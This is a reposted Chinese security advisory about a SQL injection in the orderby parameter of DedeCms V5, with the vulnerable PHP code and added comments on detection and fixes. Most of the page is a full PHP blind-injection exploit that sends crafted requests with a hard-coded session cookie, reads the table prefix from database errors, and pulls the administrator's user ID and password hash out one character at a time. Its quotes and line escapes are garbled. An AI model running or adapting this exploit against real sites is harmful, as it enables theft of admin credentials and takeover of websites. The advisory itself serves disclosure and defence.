
DedeCms V5 orderby参数注射漏洞

程序员文章站 2022-06-28 08:57:50

  影响版本:

  DedeCms V5

  漏洞描述:

  DedeCms由2004年到现在,已经经历了五个版本。从DedeCms V2开始,DedeCms开发了自己的模板引擎,使用XML名字空间风格的模板,对美工制作的直观性提供了极大的便利;从V2.1开始,DedeCms人气急剧上升,成为国内最流行的CMS软件。在DedeCms V3版本中,开始引入了模型的概念,从而摆脱了传统网站内容管理模块太分散、管理不集中的缺点。但随着时间的发展,发现纯粹用模型化并不能满足用户的需求,从而DedeCms 2007(DedeCms V5)应运而生。80sec在其产品中发现了多个严重的SQL注射漏洞,可能被恶意用户用来查询数据库的敏感信息,如管理员密码、加密key等等,从而控制整个网站。

  在joblist.php和guestbook_admin.php等文件中,orderby参数未做过滤即带入数据库查询(其值被直接拼接进SQL语句的order by子句),造成多个注射漏洞。漏洞部分代码如下:

  -------------------------------------------------------

  // Request-handler excerpt quoted by the advisory as the vulnerable code.
  // $orderby only receives a default when it is empty; any non-empty value is kept
  // exactly as supplied, and nothing in this excerpt validates or escapes it.
  // NOTE(review): where $orderby is populated is not shown here; the advisory
  // describes it as an unfiltered request parameter.
  if(empty($orderby)) $orderby = 'pubdate';

  // Reload the list

  if($dopost=='getlist'){

  printajaxhead();

  // $orderby, $pageno and $pagesize are handed to getlist() unchanged.
  getlist($dsql,$pageno,$pagesize,$orderby);// call the getlist function

  $dsql->close();

  exit();

  ……

  // getlist(): builds and runs a paged query over sec_jobs for rows whose memberid
  // equals $cfg_ml->m_id (the function body is elided after this point in the advisory).
  //
  // Security note: $orderby is concatenated into the ORDER BY clause as raw SQL text,
  // and $start/$pagesize are concatenated into LIMIT; none of them is validated or
  // escaped in the visible code. This is the injection point the advisory describes.
  //
  // Fix direction: a column name in ORDER BY cannot be passed as a bound parameter,
  // so map $orderby against a fixed allow-list of sortable column names (falling back
  // to 'pubdate'), and cast $pageno and $pagesize to integers before the query is built.
  function getlist($dsql,$pageno,$pagesize,$orderby='pubdate'){

  global $cfg_phpurl,$cfg_ml;

  $jobs = array();

  // Offset of the first row of the requested page.
  $start = ($pageno-1) * $pagesize;

  $dsql->setquery("select * from sec_jobs where memberid='".$cfg_ml->m_id."' order by $orderby desc limit $start,$pagesize ");

  $dsql->execute();// the unvalidated orderby value reaches the database here

  ……

  ----------------------------------------------------------

  <*参考

  http://www.80sec.com/dedecms-sql-injection.html

  *>

  测试方法:

  [www.sebug.net]

  本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

  // Proof-of-concept listing reproduced from the advisory. It opens by printing a
  // banner with the author credits.
  print_r('

  --------------------------------------------------------------------------------

  dedecms >=5 "orderby" blind sql injection/admin credentials disclosure exploit

  by flyh4t

  www.wolvez.org

  thx for all the members of w.s.t and my friend oldjun

  --------------------------------------------------------------------------------

  ');

  // Two command-line arguments (host, path) are required; with fewer, the script
  // prints the usage text and stops.
  if ($argc<3) {

  print_r('

  --------------------------------------------------------------------------------

  usage: php '.$argv[0].’ host path

  host: target server (ip/hostname)

  path: path to dedecms

  example:

  php ‘.$argv[0].’ localhost /

  ——————————————————————————–

  ‘);

  die;

  }

  // sendpacketii($packet): sends one raw request and captures the whole response.
  // Reads the global $host and overwrites the global $html with everything the
  // server returns; there is no return value. The script terminates if the
  // connection cannot be opened.
  function sendpacketii($packet)

  {

  global $host, $html;

  // Plain TCP connection to port 80 of the resolved host.
  $ock=fsockopen(gethostbyname($host),’80′);

  if (!$ock) {

  echo ‘no response from ‘.$host; die;

  }

  fputs($ock,$packet);

  // Reset the shared response buffer, then read until the peer closes the socket.
  $html=”;

  while (!feof($ock)) {

  $html.=fgets($ock);

  }

  fclose($ock);

  }

  // Script setup: host and path come from the command line; the table prefix
  // defaults to "dede_" unless the probe below reports a different one.
  $host=$argv[1];

  $path=$argv[2];

  $prefix=”dede_”;

  // A fixed member-session cookie accompanies every request.
  // NOTE(review): this suggests the affected page is reached as an ordinary
  // logged-in member rather than as an administrator; confirm against the application.
  $cookie=”dedeuserid=39255; dedeuseridckmd5=31283748c5a4b36c; dedelogintime=1218471600; dedelogintimeckmd5=a7d9577b3b4820fa”;

  // The path must both start and end with "/".
  if (($path[0]<>’/') or ($path[strlen($path)-1]<>’/'))

  {echo ‘error… check the path!’; die;}

  /*get $prefix*/

  // Defensive takeaway: this step only yields anything when the application returns
  // database error text to the client. The script looks for MySQL syntax-error
  // wording in the response and reads the table prefix out of the echoed query, so
  // verbose SQL errors disclose schema details. Suppressing them removes this leak
  // but does not fix the injection itself.
  $packet =”get “.$path.”/member/guestbook_admin.php?dopost=getlist&pageno=1&orderby=11′ http/1.0rn”;

  $packet.=”host: “.$host.”rn”;

  $packet.=”cookie: “.$cookie.”rn”;

  $packet.=”connection: closernrn”;

  sendpacketii($packet);

  if (eregi(”in your sql syntax”,$html))

  {

  $temp=explode(”from “,$html);

  $temp2=explode(”member”,$temp[1]);

  if($temp2[0])

  $prefix=$temp2[0];

  echo “[+]prefix -> “.$prefix.”n”;

  }

  // Candidate byte values: 0 (terminator), ASCII 48-57 (digits) and 97-102 (a-f),
  // i.e. the alphabet of a lowercase hexadecimal hash.
  $chars[0]=0;//null

  $chars=array_merge($chars,range(48,57)); //numbers

  $chars=array_merge($chars,range(97,102));//a-f letters

  echo “[~]exploting now,plz waitingrn”;

  /*get password*/

  // One request is sent per candidate value per character position, and the loop
  // stops once a 0 byte has been appended to $password.
  //
  // Detection: in web-server logs this appears as a burst of GET requests to
  // member/guestbook_admin.php with dopost=getlist whose orderby value contains SQL
  // keywords (select, substring, ascii, if) instead of a bare column name.
  //
  // Mitigation: the true/false signal is whether the response contains the database
  // error text tested below, so returning SQL errors to clients is what makes the
  // comparison observable. The underlying fix remains validating orderby against an
  // allow-list of column names.
  $j=1;$password=”";

  while (!strstr($password,chr(0)))

  {

  for ($i=0; $i<=255; $i++)

  {

  if (in_array($i,$chars))

  {

  $sql=”orderby=11+and+if(ascii(substring((select+pwd+from+”.$prefix.”admin+where+id=1),”.$j.”,1))=”.$i.”,1,(select+pwd+from+”.$prefix.”member))”;

  $packet =”get “.$path.”member/guestbook_admin.php?dopost=getlist&pageno=1&”.$sql.” http/1.0rn”;

  $packet.=”host: “.$host.”rn”;

  $packet.=”cookie: “.$cookie.”rn”;

  $packet.=”connection: closernrn”;

  sendpacketii($packet);

  // Absence of the error text is treated as a match for this position.
  if (!eregi(”subquery returns more than 1 row”,$html)) {$password.=chr($i);echo”[+]pwd:”.$password.”rn”;break;}

  }

  // No candidate matched at this position: give up.
  if ($i==255) {die(”exploit failed…”);}

  }

  $j++;

  }

  /*get userid*/

  // Same request pattern as the password loop, but against the userid column and
  // without the candidate filter: every value from 0 to 255 is tried per position.
  // The log signature is therefore the same endpoint and parameters at a higher
  // request volume.
  $j=1;$admin=”";

  while (!strstr($admin,chr(0)))

  {

  for ($i=0; $i<=255; $i++)

  {

  $sql=”orderby=11+and+if(ascii(substring((select+userid+from+”.$prefix.”admin+where+id=1),”.$j.”,1))=”.$i.”,1,(select+pwd+from+”.$prefix.”member))”;

  $packet =”get “.$path.”member/guestbook_admin.php?dopost=getlist&pageno=1&”.$sql.” http/1.0rn”;

  $packet.=”host: “.$host.”rn”;

  $packet.=”cookie: “.$cookie.”rn”;

  $packet.=”connection: closernrn”;

  sendpacketii($packet);

  if (!eregi(”subquery returns more than 1 row”,$html)) {$admin.=chr($i);echo”[+]userid:”.$admin.”rn”;break;}

  if ($i==255) {die(”exploit failed…”);}

  }

  $j++;

  }

  // Prints the two recovered values. The script labels the second one a 24-character
  // MD5 value, i.e. the stored hash, not the plaintext password.
  // NOTE(review): where this activity is found in logs, treat the admin credential
  // as exposed and rotate it.
  print_r(’

  ——————————————————————————–

  [+]userid -> ‘.$admin.’

  [+]pwd(md5 24位) -> ‘.$password.’

  ——————————————————————————–

  ‘);

  // is_hash($hash): returns true when the trimmed input begins with 24 characters
  // from [a-f0-9], otherwise false. The pattern is anchored at the start only, so
  // anything after the 24th character is not checked.
  function is_hash($hash)

  {

  if (ereg(”^[a-f0-9]{24}”,trim($hash))) {return true;}

  else {return false;}

  }

  // Final verdict: reports success only when the recovered value has that hash shape.
  if (is_hash($password)) {echo “exploit succeeded…”;}

  else {echo “exploit failed…”;}

  ?>

  爱安全建议:

  暂无

  http://www.dedecms.com// aianquan.com [2008-08-13]

 

(本文由责任编辑 pasu  整理发布)